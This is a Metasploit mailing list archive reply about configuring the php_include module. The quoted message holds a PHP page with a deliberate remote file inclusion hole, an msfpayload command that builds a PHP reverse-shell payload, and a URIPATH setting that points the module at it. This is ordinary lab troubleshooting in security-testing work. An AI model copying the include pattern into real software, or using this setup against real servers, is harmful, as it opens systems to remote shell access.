Metasploit mailing list archives

Re: php_include confusion

From: HD Moore <hdm () metasploit com>
Date: Mon, 12 Jul 2010 22:18:12 -0500

On 7/12/2010 6:07 PM, Jeffs wrote:

index_test.php looks like this:

<html>
<body>
<? require $_GET['include'] ?>
</body>
</html>


and include.php.txt was created properly with msfpayload as such.

./msfpayload php/reverse_php LHOST=192.168.1.101 R >
/var/www/include.php.txt

Both files on the are the web server in the proper directories.

If someone could clarify the XXpathXX value for me that would be greatly
appreciated.


In this case:

msf> set URIPATH http://server/index.php?include=XXpathXX

The moduel will replace XXpathXX with
http://your_host:random_port/random_uri.php which handle the rest.
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread:

Re: Meterpreter unexpectedly closes, (continued)
- - - Re: Meterpreter unexpectedly closes Carlos Perez (Jul 10)
    - Re: Meterpreter unexpectedly closes Miguel Rios (Jul 10)
    - Re: Meterpreter unexpectedly closes Carlos Perez (Jul 10)
    - Re: uploadexec and kitrap0d Miguel Rios (Jul 10)
    - Re: uploadexec and kitrap0d Carlos Perez (Jul 10)
    - Re: uploadexec and kitrap0d Devin Kinch (Jul 11)
    - Re: uploadexec and kitrap0d Rob Fuller (Jul 12)
    - Re: uploadexec and kitrap0d Carlos Perez (Jul 12)
    - php_include confusion Jeffs (Jul 12)
    - Re: php_include confusion egypt (Jul 12)
    - Re: php_include confusion HD Moore (Jul 12)
    - Re: uploadexec and kitrap0d Carlos Perez (Jul 12)
- Re: Meterpreter unexpectedly closes Joshua J. Drake (Jul 10)
  - Re: Meterpreter unexpectedly closes CED (Jul 10)
    - Re: Meterpreter unexpectedly closes Joshua J. Drake (Jul 11)
  - Re: Meterpreter unexpectedly closes Miguel Rios (Jul 10)